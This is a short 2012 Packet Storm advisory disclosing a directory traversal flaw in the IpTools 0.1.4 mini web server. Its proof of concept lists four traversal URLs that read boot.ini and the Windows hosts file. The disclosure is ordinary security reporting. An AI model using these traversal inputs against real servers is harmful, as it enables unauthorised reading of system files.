IpTools 0.1.4 Directory Traversal

2012-01-07T00:00:00
ID PACKETSTORM:108431
Type packetstorm
Reporter demonalex
Modified 2012-01-07T00:00:00

Description

                                        
                                            `Title: IpTools(Tiny TCP/IP server) - WebServer Directory Traversal Vulnerability  
  
Software : IpTools(Tiny TCP/IP server)  
  
Software Version : 0.1.4  
  
Vendor: http://iptools.sourceforge.net/iptools.html  
  
Class: Input Validation Error   
  
CVE:  
  
Remote: Yes   
  
Local: No   
  
Published: 2012-01-06   
  
Updated:   
  
Impact : High  
  
Bug Description :  
IPtools is a set of small tiny TCP/IP programs includes mini Webserver(Executable file: Thttpd.bat), etc. And its mini webserver does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser.  
  
POC:  
http://127.0.0.1/..\..\boot.ini  
http://127.0.0.1/../../boot.ini  
http://127.0.0.1/..\..\windows\system32\drivers\etc\hosts  
http://127.0.0.1/../../windows/system32/drivers/etc/hosts  
,etc.  
  
Credits : This vulnerability was discovered by demonalex@163.com  
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk  
Pentester/Researcher  
Dark2S Security Team/PolyU.HK  
`